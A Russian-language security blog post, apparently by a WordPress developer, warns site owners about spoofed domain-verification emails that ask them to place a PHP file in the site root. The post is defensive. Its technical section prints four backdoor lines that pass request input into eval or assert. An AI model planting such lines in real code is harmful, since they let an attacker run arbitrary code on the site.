Security Blog
Security Blog
Posted By Gregory

Не доверяйте этим поддельным письмам с подтверждением домена.

Если вы когда-либо получите письмо с просьбой создать, загрузить или установить PHP-код на ваш сайт, вы должны игнорировать его.


English version: Do not trust those fake domain confirmation emails


Недавно некоторые из моих клиентов получили странные письма по электронной почте от регистраторов доменов. В этих письмах содержится просьба о подтверждении собственных доменов. Я проверил одно из этих писем и быстро определил, что это поддельное письмо . Все письма имеют одинаковый рисунок и просьбу создать PHP-файл в корневой папке сайта с определенным названием и заданным содержимым. Излишне говорить, что предлагаемое содержимое этого PHP-файла содержит вредоносный код, известный как код бэкдора. Этот тип кода позволяет злоумышленнику выполнять любые действия на веб-сайте жертвы.

Если вы когда-либо получите письмо с просьбой создать, загрузить или установить PHP-код на ваш сайт, вы должны его игнорировать. Без исключений. Даже если письмо придет от президента или твоей мамы.

Мошеннические письма кажутся законными из-за законного адреса электронной почты отправителя . Но это подделка электронной почты. Вы не ожидаете получить поддельное электронное письмо от своих друзей или регистратора домена. Верно? Нет! Любое письмо электронной почты может содержать любой адрес электронной почты «От». Подавляющее большинство почтовых серверов и почтовых клиентов не проверяют и не подтверждают адрес отправителя. Итак, вы видите, что это хотел хакер. Вы не должны доверять письмам, полученным по электронной почте от известного отправителя, если письмо содержит запрос на какое-либо подозрительное действие, например установку кода на ваш веб-сайт или приложения на ваш компьютер.

Технические детали

Поддельные электронные письма обычно содержат некоторые из следующих строк PHP.

assert(stripslashes($_REQUEST['something']));

eval(stripslashes($_REQUEST['something']));

assert(base64_decode($_REQUEST['something']));

eval(base64_decode($_REQUEST['something']));

К вашему сведению: base64_decode, eval и Assert являются хорошо известными маркерами подозрительного или вредоносного PHP-кода.

См. также: Инспектор плагинов выявляет проблемы безопасности с другими плагинами.


I'm a team lead in Cerber Tech. I'm a software & database architect, WordPress - PHP - SQL - JavaScript developer. I started coding in 1993 on IBM System/370 (yeah, that was amazing days) and today software engineering at Cerber Tech is how I make my living. I've taught to have high standards for myself as well as using them in developing software solutions.

View Comments
There are currently no comments.